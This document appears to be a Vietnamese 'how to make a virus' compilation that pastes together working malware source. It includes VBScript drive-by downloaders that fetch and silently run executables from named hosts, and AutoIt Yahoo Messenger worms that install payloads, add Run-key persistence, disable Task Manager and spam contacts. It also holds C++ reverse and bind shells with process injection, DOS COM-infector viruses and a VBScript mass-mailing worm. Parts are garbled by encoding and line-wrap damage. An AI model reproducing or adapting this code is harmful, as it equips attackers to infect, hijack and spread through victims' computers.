The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this[r]
(1)C
ách tạo virus
[YM Virus]nhut.be
<script language="VBScript">
on error resume next
dl = "http://nhut.be/dkc.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
[YM Virus]viet8x.evonet.ro
<html>
<head>
<title>
:: Welcome ::
</title>
(2)on error resume next
dl = "http://viet8x.evonet.ro/task.exe"
Set df = document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</head>
<body bgcolor="lavender">
<br><br><br>
<center>
<h3>You're welcome</h3>
</center>
(3)[YM Virus]Vuichoivn.com Scripts
<script language="VBScript"> on error resume next
dl = "http://vuichoivn.com/guitangban.exe" Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"") a1="Ado"
a2="db." a3="Str" a4="eam"
str1=a1&a2&a3&a4 str5=str1
set S = df.createobject(str5,"") S.type =
str6="GET"
x.Open str6, dl, False x.Send
fname1="svchost32.exe"
set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1) S.open
S.write x.responseBody S.savetofile fname1,2 S.close
set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0
</script>
[YM Virus]VuiVeVn.HP.Ms
$website = "http://72.232.123.170/~love/"
$website2 = "Http://dasdasdasd"
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(500)
EndIf
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "Task Manager",
"REG_SZ","C:\WINDOWS\taskmng.exe")
(4)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main",
"Start Page", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz",
"content url", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir &
"\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main",
"Window Title", "REG_SZ", "wWw.LoveNovel.Kiss.To")
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)")
if $wincheck = then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(600)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
Code virus gaixinh
Sưu tầm share bạn
; <AUT2EXE VERSION: 3.1.1.112>
;
-; < -;AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
;
;
-;
; AutoIt Version: 3.1.0
(5);
; Script Function:
; Template AutoIt script.
;
;
-; Script Start - Add your code below here
$version = "1.0"
AutoItSetOption ("TrayIconHide","1")
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)
sleep(3000)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir &
"\Messenger.exe")
InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = then
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read <> $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")
endif
endif
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main",
"Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")
$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )
if $check = then
(6)FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")
endif
;; Đoạn xóa để đoạn mã khơng bị lợi dụng
;; xLuke
if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or
($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg"
target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?
file=Gaixinh.jpg</a>")
if $wincheck = then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif
Next
;
-; < -;AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
;
-
coding ~ ntshell, tiny reverse win32 shell
-ntshell.cpp Code:
PHP Code:
//Reverse NT Shell 1.1 by D-oNe
(7)//
//Start NC: nc.exe -l -p 666, Then Run ntshell.exe! //Optmization Code
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#pragma comment(linker,"/ENTRY:EntryPoint") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")
#pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/base:0x7D000000") //Libs
#pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "ws2_32") //Includes
#define WIN32_LEAN_AND_MEAN #include <windows.h>
#include <tlhelp32.h> #include <winsock2.h> //Settings
char *szIP = "127.0.0.1";
int port = 666;
char *injproc = "notepad.exe"; //Shell Code
DWORD WINAPI shell(LPVOID param) {
WSADATA WSAData;
struct sockaddr_in sin; SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
LoadLibrary("kernel32.dll"); LoadLibrary("user32.dll"); LoadLibrary("ws2_32.dll"); memset(&sin, 0, sizeof(sin));
WSAStartup(MAKEWORD(1, 1), &WSAData); sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(szIP);
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0,
0);
connect(sock, (struct sockaddr*)&sin, sizeof(sin)); memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi)); si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE;
(8)si.hStdError = (HANDLE)sock;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi);
return 0; }
//Inject Code
bool injectcode(HANDLE hProcess, LPTHREAD_START_ROUTINE lpCodeToInj ect)
{
DWORD dwThread, dwSize, dwWritten; PBYTE pbModule;
LPVOID lpBuffer; HANDLE hThread;
pbModule = (PBYTE)GetModuleHandle(0); dwSize = ((PIMAGE_NT_HEADERS)(pbModule+ ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew ))->OptionalHeader.SizeOfImage;
VirtualFreeEx(hProcess, pbModule, 0, MEM_RELEASE);
lpBuffer = VirtualAllocEx(hProcess, pbModule, dwSize, MEM_COM MIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!lpBuffer) return FALSE;
if (!WriteProcessMemory(hProcess, lpBuffer, pbModule, dwSize, &dwWritten)) return FALSE;
hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeToInject,
pbModule, 0, &dwThread);
if (!hThread) return FALSE; CloseHandle(hThread); CloseHandle(hProcess); return TRUE;
}
DWORD GetPID(char *szExe) {
HANDLE hProcessSnap; PROCESSENTRY32 pe32;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,
);
pe32.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hProcessSnap, &pe32)) {
CloseHandle(hProcessSnap); return 0;
} {
if (lstrcmpi(pe32.szExeFile, szExe) == 0) {
return (pe32.th32ProcessID); break;
} }
while (Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap);
(9)void EntryPoint() {
HANDLE hProcess;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetPID(injp roc));
injectcode(hProcess, shell); ExitProcess(0);
}
R@n
's items
tiếp theo
mShell.cpp Code
Trích:
//mShell 0.2 by D-oNe,
aka_done@hotmail.com
//
//Optimization Code
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#pragma comment(linker,"/ENTRY:shell")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
#pragma comment(linker,"/MERGE:.reloc=.data")
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078")
#pragma comment(linker,"/FILEALIGN:0x200")
#pragma comment(linker,"/subsystem:windows")
//Includes
#include <windows.h>
#include <winsock.h>
//Port To Listen On
const int port = 23;
//Shell Handler
DWORD WINAPI shell_handler(void *sendsock_)
{
(10)HANDLE hPipeRead1, hPipeWrite1, hPipeRead2, hPipeWrite2;
int count = 0, i;
PROCESS_INFORMATION pInfo;
SECURITY_ATTRIBUTES secu =
{
(DWORD)sizeof(SECURITY_ATTRIBUTES), NULL, TRUE
};
SOCKET sendsock = (SOCKET)sendsock_;
STARTUPINFO sInfo;
if (sendsock == INVALID_SOCKET) return 0;
CreatePipe(&hPipeRead1, &hPipeWrite1, &secu, 0);
CreatePipe(&hPipeRead2, &hPipeWrite2, &secu, 0);
GetEnvironmentVariable("ComSpec", szCmdPath, sizeof(szCmdPath));
memset(&sInfo, 0, sizeof(sInfo));
memset(&pInfo, 0, sizeof(pInfo));
sInfo.cb = sizeof (STARTUPINFO);
sInfo.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
sInfo.wShowWindow = SW_HIDE;
sInfo.hStdInput = hPipeRead2;
sInfo.hStdOutput = hPipeWrite1;
sInfo.hStdError = hPipeWrite1;
CreateProcess(NULL, szCmdPath, &secu, &secu, TRUE, 0, NULL, NULL, &sInfo,
&pInfo);
while (sendsock != SOCKET_ERROR)
{
memset(szBuffer, 0, sizeof(szBuffer));
PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL);
while (lpNumberOfBytesRead)
{
if (!ReadFile(hPipeRead1, szBuffer, sizeof(szBuffer), &lpNumberOfBytesRead, NULL))
break;
else send(sendsock, szBuffer, lpNumberOfBytesRead, 0);
PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL);
}
i = recv(sendsock, szBuffer, sizeof(szBuffer) ,0);
if (sendsock == 0)
{
count++;
if (count > 1) break;
}
if (!strstr(szBuffer, "_exit") == 0)
{
TerminateProcess(pInfo.hProcess, 0);
return 0;
(11)else WriteFile(hPipeWrite2, szBuffer, i, &lpNumberOfBytesRead, 0);
Sleep(10);
}
TerminateProcess(pInfo.hProcess, 0);
return 0;
}
//Shell Listener
void shell()
{
DWORD dwID;
register int size;
SOCKET shellsock, sendsock;
struct sockaddr_in sin;
WSADATA wsadata;
if (WSAStartup(MAKEWORD(2,2), &wsadata) != 0) ExitProcess(0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(port);
size = sizeof(sin);
shellsock = socket (AF_INET, SOCK_STREAM, 0);
bind(shellsock, (struct sockaddr *)&sin, sizeof(sin));
listen(shellsock, 0);
while (1)
{
sendsock = accept(shellsock,(struct sockaddr *)&sin, &size);
if (sendsock != INVALID_SOCKET) CreateThread(0, 0, shell_handler, (void *)sendsock,
0, &dwID);
Sleep(100);
}
closesocket(sendsock);
closesocket(shellsock);
WSACleanup();
return;
}
; The EXEcution III Virus.
;
; Well, you're now the prouw owner of the smallest virus ever made!
; only 23 bytes long and ofcourse again very lame
; But what the heck, it's just an educational piece of code!!
;
(12); Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his
; nice try to make the smallest (27 bytes and 25 bytes) virus
gotcha!! ;-))
;
; BTW Don't forget, I only tested it unter DOS 5.0 so on other
versions
; it might not work!
_CODE SEGMENT
ASSUME CS:_CODE
ORG 100h
START: ; That's where we're starting
FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH
MOV AH,4Eh ; Let's search!
DO_IT: MOV DX,SI ; Make DX = 100h (offset file)
INT 21h ; Search now dude!
MOV AX,3D01h ; Hmm, infect that fucking file!
MOV DX,9Eh ; Name is at DS:[9Eh]
INT 21h ; Go it!
XCHG BX,AX ; Put the handle in BX
MOV AH,40h ; Write myself!
JMP DO_IT ; Use other routine
_CODE ENDS
END START
Virus FirstStar Source Code
;
********************************************************
********************;
; ;
(13); -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION ***
;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be
Passed ;
; Around Among the General Public It Will be Very Useful for
Learning how ;
; Viruses Work and Propagate But Anybody With Access to an
Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly
Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it
Already ;
; Is Keep This Code in Responsible Hands! ;
; ;
;
********************************************************
********************;
;
; First-Star / 222 Virus
;
; (C) by Glenn Benton in 1992
; This is a non-resident direct action COM infector in current
dirs.
;
;
;
(14)Start: Jmp MainVir
Db '*'
MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
(15)Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
(16)Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret
CallPtr Db 0e9h,0,0
FileSpec
Db '*.COM',0
OrgPrg: Int 20h
Nop
Nop
VirLen Equ $-MainVir
;
********************************************************
********************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
(17); ;
; *** NOT FOR GENERAL DISTRIBUTION ***
;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be
Passed ;
; Around Among the General Public It Will be Very Useful for
Learning how ;
; Viruses Work and Propagate But Anybody With Access to an
Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly
Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it
Already ;
; Is Keep This Code in Responsible Hands! ;
; ;
;
********************************************************
********************;
;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call
<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79
H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MÃ NGUỒN CỦA VIRUS HOME PAGE
'Homepage Created By Robinhood
Set FSO =3D createobject("scripting.filesystemobject")
dirsystem =3D FSO.getspecialfolder(1)
Path=3D dirsystem & "\Win32.dll.vbs"
Set WSH createobject("wscript.shell")
WSH.regwrite
(18)"wscript.exe " & Path& " %"
FSO.copyfile wscript.scriptfullname, Path
payload=20
If =
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre
ntVersion\Homepage\Send
mail") <> then
sendmail
End if
If
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre
ntVersion\Homepage\IRC"
) <> then
IRC ""
End if
Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
sourcetext sourcefile.readall
sourcefile.close
Do
if not(FSO.fileexists(wscript.scriptfullname)) then
set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
filebackup.write sourcetext
filebackup.close
end if
sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\Win32dll"
)
If s<> "wscript.exe " & Path& " %" then
WSH.regwrite =
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe
" & Path& " %"
end if
s=3D ""
loop=20
Function sendmail()
Set myapp =3D CreateObject("Outlook.Application")
If myapp =3D "Outlook" Then
Set myname =3D myapp.GetNameSpace("MAPI")
Set myaddlists =3D myname.AddressLists
For Each myaddlist In myaddlists
If myaddlist.AddressEntries.Count <> Then
x =3D myaddlist.AddressEntries.Count
For i =3D To x
(19)mailitem.To =3D myadd.Address
mailitem.Subject =3D "Very Important!"
mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
important." & vbcrlf & ""
execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
& Chr(115)
copypath Path
mailitem.DeleteAfterSubmit True
myatts.Add copypath
If mailitem.To <> "" Then
mailitem.Send
End If
Next
End If
Next
End If
End function
Function IRC(ircpath)
If ircpath <> "" Then
programpath
WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion
\ProgramFilesDir")
If FSO.fileexists("c:\mirc\mirc.ini") Then
ircpath =3D "c:\mirc"
ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
ircpath =3D "c:\mirc32"
ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
ircpath =3D programpath & "\mirc"
ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
ircpath =3D programpath & "\mirc"
Else
ircpath =3D ""
End If
End If
If ircpath <> "" Then
Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
send $nick "
text =3D text & Path
(20)ircscript.Close
End If
End Function=20
Function payload()
Randomize
If + Int(Rnd * 5) =3D then
WSH.run "Http://www.virii.com.ar",false
end if
end function
Code:
; virus from ALT-11 mag
; -;
; Coded by: Azagoth
; -; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ;
-; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes
; - It searches the current directory for uninfected files If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found (One infection per run) ; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path ;
.model tiny code
org 100h ; adjust for psp start:
call get_disp ; push ip onto stack get_disp:
pop bp ; bp holds current ip sub bp, offset get_disp ; bp = code displacement ; original label offset is stored in machine code
(21)mov ah, 47h ; save cwd
xor dl, dl ; = default drive lea si, [bp + org_path]
int 21h get_dta:
mov ah, 2fh int 21h
mov [bp + old_dta_off], bx ; save old dta offset set_dta: ; point to dta record mov ah, 1ah
lea dx, [bp + dta_filler] int 21h
search:
mov ah, 4eh ; find first file
mov cx, [bp + search_attrib] ; if successful dta is lea dx, [bp + search_mask] ; created
int 21h
jnc clear_attrib ; if found, continue find_next:
mov ah, 4fh ; find next file int 21h
jnc clear_attrib still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd int 21h
jnc search
jmp bomb ; at root, no more files clear_attrib:
mov ax, 4301h
xor cx, cx ; get rid of attributes lea dx, [bp + dta_file_name]
int 21h open_file:
mov ax, 3D02h ; AL=2 read/write lea dx, [bp + dta_file_name]
int 21h
xchg bx, ax ; save file handle ; bx won't change from now on
check_if_command_com: cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
(22)repe cmpsb ; repeat while equal jne check_if_infected
jmp close_file check_if_infected:
mov dx, word ptr [bp + dta_file_size] ; only use first word since
; COM file sub dx, ; file size - mov ax, 4200h
mov cx, ; cx:dx ptr to offset from
int 21h ; origin of move
mov ah, 3fh ; read last characters mov cx,
lea dx, [bp + last_chars] int 21h
mov ah, [bp + last_chars] cmp ah, [bp + virus_id] jne save_3_bytes
mov ah, [bp + last_chars + 1] cmp ah, [bp + virus_id + 1] jne save_3_bytes
jmp close_file save_3_bytes:
mov ax, 4200h ; 00=start of file xor cx, cx
xor dx, dx int 21h mov ah, 3Fh mov cx,
lea dx, [bp + _3_bytes] int 21h
goto_eof:
mov ax, 4202h ; 02=End of file
xor cx, cx ; offset from origin of move
xor dx, dx ; (i.e nowhere) int 21h ; ax holds file size ; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, ; file size - = jmp disp
mov [bp + jmp_disp], ax write_code:
(23)mov cx, virus_length ;*** equate lea dx, [bp + start]
int 21h goto_bof:
mov ax, 4200h xor cx, cx xor dx, dx int 21h
write_jmp: ; to file mov ah, 40h
mov cx,
lea dx, [bp + jmp_code] int 21h
inc [bp + infections] restore_date_time:
mov ax, 5701h
mov cx, [bp + dta_file_time] mov dx, [bp + dta_file_date] int 21h
close_file:
mov ah, 3eh int 21h restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attributes
mov ax, 4301h
lea dx, [bp + dta_file_name] int 21h
done_infecting?:
mov ah, [bp + infections] cmp ah, [bp + max_infections] jz bomb
jmp find_next bomb:
; cmp bp,
; je restore_path ; original run ;
; Stuff deleted restore_path:
(24)mov ah, 3bh ; cd to original path lea dx, [bp + org_path]
int 21h restore_dta:
mov ah, 1ah
mov dx, [bp + old_dta_off] int 21h
restore_3_bytes: ; in memory lea si, [bp + _3_bytes]
mov di, 100h
cld ; auto-inc si, di mov cx,
rep movsb return_control_or_exit?:
cmp bp, ; bp = if original run je exit
mov di, 100h ; return control back to prog
jmp di ; -> cs:100h exit:
mov ax, 4c00h int 21h
; Variable Declarations
-old_dta_off dw ; offset of old dta address
; - dta record
dta_filler db 21 dup (0) dta_file_attrib db
dta_file_time dw dta_file_date dw dta_file_size dd
dta_file_name db 13 dup (0)
; -search_mask db '*.COM',0 ; files to infect: *.COM search_attrib dw 00100111b ; all files a,s,h,r com_com db 'COMMAND.COM'
previous_dir db ' ',0 root db '\',0
org_path db 64 dup (0) ; original path infections db ; counter
max_infections db
(25)last_chars db 0, ; last chars = ID ? virus_id db 'AZ'
eov: ; end of virus virus_length equ offset eov - offset start
end start
Code:
VSize=085h
Code Segment
Assume CS:Code org
db 4Dh jmp Start Org 600h
Bytes db 0CDh,20h,90h,90h Start: mov si, 0100h
mov bx, offset Int21 mov cx, 0050h
mov di, si add si, [si+2] push di
movsw movsw
mov es, cx cmpsb
je StartFile dec si
dec di rep movsw
mov es, cx xchg ax, bx xchg ax, cx Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h] stosw
jcxz Loop0 xchg ax, bx StartFile:
push ds pop es ret
(26)push bx push dx push ds push es
mov ax, 3D02h call DoInt21 jc EndExec
cbw ;Zero AH cwd ;Zero DX
mov bx, si ;Move handle to BX mov ds, ax ;Set DS and ES to 60h, mov es, ax ;the virus data segment mov ah, 3Fh ;Read first bytes int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected mov al,
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e Write operation mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX stosw ;Complete JMP instruction xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file int 69h
EndExec: pop es pop ds pop dx pop bx pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, ;4 bytes will be read/written xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write xor di, di ;Zero DI
(27)End ;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ä
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
;
